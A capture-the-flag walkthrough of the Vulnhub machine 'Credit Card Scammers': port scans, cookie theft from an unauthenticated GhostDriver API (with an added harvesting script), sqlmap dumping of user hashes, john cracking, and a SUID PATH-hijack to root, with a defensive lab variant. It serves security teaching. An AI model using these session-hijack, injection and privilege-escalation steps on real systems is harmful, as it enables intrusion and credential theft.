[VLN] Credit Card Scammers

Today we are going to hack the Vulnhub machine called Credit Card Scammers. You can download it from the following link: Credit Card Scammers

Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 12:54 CEST
Nmap scan report for ppeshop.home (192.168.1.52)
Host is up (0.0012s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 8d:0a:3a:42:5f:92:47:69:33:59:b3:77:53:3c:be:73 (RSA)
|   256 ab:3d:26:3b:d9:02:50:a4:49:c0:bf:13:75:dc:a5:73 (ECDSA)
|_  256 fb:6a:7e:1b:05:f9:d1:ef:be:dd:ff:39:ed:f5:f5:63 (ED25519)
80/tcp   open   http       Apache httpd 2.4.37 ((centos))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Your PPE Supplier
443/tcp  closed https
9090/tcp closed zeus-admin

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 197.03 seconds
Let's see whether port 80 has anything more interesting to show us.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.52 -w /usr/share/wordlists/dirb/big.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.52
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/05/13 13:04:14 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess.txt (Status: 403)
/LICENSE (Status: 200)
/_admin (Status: 301)
/buynow.php (Status: 200)
/cgi-bin/ (Status: 403)
/class (Status: 301)
/css (Status: 301)
/img (Status: 301)
/noindex (Status: 301)
/settings (Status: 301)
/vendor (Status: 301)
===============================================================
2020/05/13 13:04:24 Finished
===============================================================
We see the /_admin directory; browsing to http://192.168.1.52/_admin/dist takes us to a login screen. Separately, we look for more on port 443: nmap reported it closed during the scan, but it answers plain HTTP (no TLS) when we try, which is why we browse it as http:// with the explicit port.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.52:443 -w /usr/share/wordlists/dirb/big.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.52:443
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/05/13 13:04:14 Starting gobuster
===============================================================
/sessions (Status: 200)
/shutdown (Status: 200)

===============================================================
2020/05/13 13:04:24 Finished
===============================================================
We see a directory called /sessions. Opening it shows something related to phantomjs and ghostdriver: GhostDriver is the WebDriver server built into PhantomJS, and its REST API carries no authentication of its own, so anyone who can reach the port can drive the headless browser and inspect its sessions. Searching further, we find the list of commands GhostDriver implements: https://docs.google.com/spreadsheets/d/17PKHWWhOgEFB8Vznju_bB6p9duguo-2NqL9qBgUQiYE/edit#gid=0
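What that API gives up can be checked, and reused, with the following script. It is an added example and not code from the original writeup: it lists the GhostDriver sessions, reads the cookies of the first one, builds a Cookie header from them and replays it against /_admin/dist/ on port 80. The /sessions and /session/<id>/cookie endpoints are the ones used in the exploitation below; the JSON field names are the JSON Wire Protocol's; the cookie name PHPSESSID and the sample session id and cookie value are constructed for the offline demonstration and are not the target's real values.

```shell
#!/bin/sh
# Added example, not from the original writeup: harvest the logged-in
# browser's cookies from the unauthenticated GhostDriver (WebDriver) API on
# port 443 and replay them against the admin panel. The endpoints come from
# the writeup; the JSON field names are the JSON Wire Protocol's; the cookie
# name PHPSESSID and every sample value used offline are constructed
# assumptions, not data taken from the target.
set -eu

# extract_json_strings KEY  < json  ->  one line per *string* value of KEY.
# Meant for the compact JSON WebDriver returns: it matches "KEY":"..." only,
# so the top-level "value":[...] array never gets in the way.
extract_json_strings() {
    grep -o "\"$1\" *: *\"[^\"]*\"" | sed 's/.*: *"\([^"]*\)"$/\1/'
}

# session_ids < json(GET /sessions)  ->  ids of the live browser sessions.
session_ids() {
    extract_json_strings id
}

# cookie_pairs < json(GET /session/<id>/cookie)  ->  name=value per cookie.
# Each cookie object is cut out at its closing brace, so key order inside the
# object does not matter; cookie values containing "}" are not expected.
cookie_pairs() {
    tr '}' '\n' | while IFS= read -r obj; do
        name=$(printf '%s' "$obj" | extract_json_strings name)
        value=$(printf '%s' "$obj" | extract_json_strings value)
        if [ -n "$name" ]; then
            printf '%s=%s\n' "$name" "$value"
        fi
    done
}

# cookie_header < json(GET /session/<id>/cookie)  ->  one "Cookie: ..." line
# ready for curl -H, e.g. "Cookie: PHPSESSID=...; theme=dark".
cookie_header() {
    printf 'Cookie: %s\n' "$(cookie_pairs | paste -s -d ';' - | sed 's/;/; /g')"
}

# Constructed /session/<id>/cookie reply for the offline self-check (not real data).
SAMPLE_COOKIE_REPLY='{"sessionId":"022189e0-95f5-11ea-b7bf-5d93144ae786","status":0,"value":[{"domain":"192.168.1.52","httponly":true,"name":"PHPSESSID","path":"/","secure":false,"value":"c0nstructedsess10n"}]}'

# Live use only when TARGET (the WebDriver listener, port included) is set:
#   TARGET=http://192.168.1.52:443 sh hijack.sh
# ${TARGET%:*} strips the port again, since the admin panel lives on port 80.
if [ -n "${TARGET:-}" ]; then
    sid=$(curl -s "$TARGET/sessions" | session_ids | head -n 1)
    echo "[*] ghostdriver session: $sid"
    hdr=$(curl -s "$TARGET/session/$sid/cookie" | cookie_header)
    echo "[*] stolen $hdr"
    # HTTP 200 instead of a redirect to the login form means the hijacked
    # session is accepted by the admin panel.
    curl -s -o /dev/null -w 'admin panel: HTTP %{http_code}\n' \
        -H "$hdr" "${TARGET%:*}/_admin/dist/"
else
    printf '%s' "$SAMPLE_COOKIE_REPLY" | cookie_header
fi
```

The parsing is deliberately grep/sed only so it runs on a bare attack box; with jq available, `jq -r '.value[].id'` and `jq -r '.value[] | "\(.name)=\(.value)"'` do the same job more robustly.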

Exploitation


After reading through those commands, we open http://192.168.1.52:443/sessions, which lists the session id. We copy it and request http://192.168.1.52:443/session/022189e0-95f5-11ea-b7bf-5d93144ae786/cookie, then copy the cookie's "value". In other words, the WebDriver API hands out the session cookie of whoever the headless browser is logged in as, so we never need the admin password. We open http://192.168.1.52/_admin/dist/, set that "value" as our cookie with a cookie manager, and after reloading the page we are logged in. We go to "Database Admin -> Execute" and capture the request with Burp Suite, saving it to a file (hackme.txt). We run sqlmap on it, and it reports that the command parameter is injectable (note that -r replays the request exactly as captured, hijacked cookie included, so the injection is reached through the stolen session). We list the databases.

sml@Cassandra:~$ sqlmap -r hackme.txt --dbs
[18:20:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:20:06] [INFO] fetching database names
[18:20:06] [INFO] fetching number of databases
[18:20:06] [INFO] resumed: 2
[18:20:06] [INFO] resumed: information_schema
[18:20:06] [INFO] resumed: orders
available databases [2]:
[*] information_schema
[*] orders
We list the tables.

sml@Cassandra:~$ sqlmap -r hackme.txt --dbs -D orders --tables
[18:20:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:20:10] [INFO] fetching database names
[18:20:10] [INFO] fetching number of databases
[18:20:10] [INFO] resumed: 2
[18:20:10] [INFO] resumed: information_schema
[18:20:10] [INFO] resumed: orders
available databases [2]:
[*] information_schema
[*] orders
[18:20:10] [INFO] fetching tables for database: 'orders'
[18:20:10] [INFO] fetching number of tables for database 'orders'
[18:20:10] [INFO] resumed: 2
[18:20:10] [INFO] resumed: orders
[18:20:10] [INFO] resumed: users
Database: orders
[2 tables]
+--------+
| orders |
| users  |
+--------+
Finally, we dump the users table.

sml@Cassandra:~$ sqlmap -r hackme.txt --dump -D orders -T users
Database: orders
Table: users
[2 entries]
+--------+--------------+--------------------------------------------------------------+
| userID | userName     | password                                                     |
+--------+--------------+--------------------------------------------------------------+
| 1      | admin        | $2y$1X$A4jqwtWB73.TAMIeplx0T.5oG/mnHR1qTDa8cmtTIvW3ZTjdSjdjC |
| 2      | m0n3y6r4bb3r | $2y$12$EX/FDsztTMwftzPRyY8gFuM7ZjAphQRZs88qpZpmboRogOAOYXowC |
+--------+--------------+--------------------------------------------------------------+
We copy the m0n3y6r4bb3r user's hash to a file and crack it with john and the rockyou.txt wordlist. Only that hash goes in the file: the admin hash as pasted above has a malformed cost field ($2y$1X$ where bcrypt expects two digits), so john would not load it.

sml@Cassandra:~$ nano tocrack.txt
sml@Cassandra:~$ sudo /usr/sbin/john tocrack.txt --wordlist=/home/sml/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
delta1           (?)
1g 0:00:07:12 DONE (2020-05-17 19:07) 0.002313g/s 44.64p/s 44.64c/s 44.64C/s greta..blakey
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We get the password: delta1. Note the speed: bcrypt at cost 12 (4096 iterations) runs at about 45 candidates per second here, so the full rockyou list would take days; the crack finished in seven minutes only because delta1 sits early in the list. We log in as moneygrabber, which is m0n3y6r4bb3r with the leetspeak digits turned back into letters (0→o, 3→e, 6→g, 4→a).

Low Shell



sml@Cassandra:~$ ssh moneygrabber@192.168.1.52
MONEY MAKER.

PLEASE LOGIN.
moneygrabber@192.168.1.52's password: 
Last login: Thu May 14 21:43:28 2020 from 192.168.1.148
[moneygrabber@ppeshop ~]$
We explore the system and look for anything interesting.

[moneygrabber@ppeshop ~]$ find / -perm -4000 2>/dev/null
--SNIP--
/usr/bin/backup
--SNIP--
We see that /usr/bin/backup has the SUID bit set. Running it shows it calls tar (on mysql.tar) by bare name rather than by absolute path, so we create symbolic links to bash named tar, mysql and mysql.tar to cover whichever name gets looked up, put their directory first in PATH so the lookup resolves to our links, and run it :) The id output afterwards shows the real uid is 0 as well, so backup sets both the real and effective uid to root before calling tar; had it only raised the effective uid, bash would have dropped it again on startup unless started with -p.

Privilege Escalation



[moneygrabber@ppeshop ~]$ mkdir bin
[moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/tar
[moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/mysql
[moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/mysql.tar
[moneygrabber@ppeshop ~]$ export PATH=/home/moneygrabber/bin:$PATH
[moneygrabber@ppeshop ~]$ /usr/bin/backup
[root@ppeshop bin]# id
uid=0(root) gid=1000(moneygrabber) groups=1000(moneygrabber)
[root@ppeshop bin]# cd /root
[root@ppeshop root]# ls
anaconda-ks.cfg  flag3.txt  ghostdriver.log
[root@ppeshop root]# cat flag3.txt 
y2zmGeGjrA4dbDj4wBWr
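As an added example (not the original author's code), here is an unprivileged lab that reproduces the mechanic the SUID backup binary falls for: a stand-in backup script that calls tar through PATH lookup, the attacker's fake tar placed first in PATH, and a hardened variant with a fixed PATH and an absolute tool path. The script names, the fake tar and the marker file are constructed for the demo; nothing here needs root and it does not touch /usr/bin/backup.

```shell
#!/bin/sh
# Added example, not the writeup's code: an unprivileged lab reproducing the
# mechanic /usr/bin/backup falls for. A stand-in "backup" script calls tar by
# bare name, so the caller's PATH decides which "tar" runs with backup's
# privileges. Everything lives in a temp dir as the current user; the script
# names, the fake tar and the marker file are constructed for the demo.
set -eu

LAB=$(mktemp -d)
trap 'rm -rf "$LAB"' EXIT
mkdir -p "$LAB/bin" "$LAB/data"
echo "cardholder data" > "$LAB/data/cards.txt"

# Vulnerable stand-in for backup: bare "tar", PATH inherited from the caller.
cat > "$LAB/backup" <<'EOF'
#!/bin/sh
cd "$(dirname "$0")/data"
tar cf ../mysql.tar .
EOF

# Hardened stand-in: fixed PATH and an absolute path to the tool, so a
# directory the caller controls is never searched first (tar may live in
# /usr/bin on some systems; either way the attacker's copy is never used).
cat > "$LAB/backup-fixed" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
cd "$(dirname "$0")/data"
/bin/tar cf ../mysql.tar .
EOF

# Attacker-controlled "tar". On the box this was a symlink to bash (giving a
# shell); here it drops a marker so the hijack is visible non-interactively.
cat > "$LAB/bin/tar" <<EOF
#!/bin/sh
echo "hijacked: tar ran as \$(id -un) with args: \$*" > "$LAB/pwned"
EOF
chmod +x "$LAB/backup" "$LAB/backup-fixed" "$LAB/bin/tar"

# run_backup NAME -> prints "hijacked" or "clean" after running $LAB/NAME with
# the attacker's bin directory first in PATH, just like the writeup's export.
run_backup() {
    rm -f "$LAB/pwned" "$LAB/mysql.tar"
    PATH="$LAB/bin:$PATH" "$LAB/$1" >/dev/null 2>&1 || true
    if [ -f "$LAB/pwned" ]; then echo hijacked; else echo clean; fi
}

echo "backup       : $(run_backup backup)"
cat "$LAB/pwned" 2>/dev/null || true
echo "backup-fixed : $(run_backup backup-fixed)"
```

On a real target, confirm the bare name before relying on the trick: `strings /usr/bin/backup | grep -i tar` shows the command string, and `ltrace` or `strace -f -e execve ./backup` (where installed) shows whether PATH is reset before the call. The fix on the defending side is the one in backup-fixed: set PATH explicitly and call helpers by absolute path, or avoid shelling out from a SUID binary altogether.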

End


And with that we are root on the box :)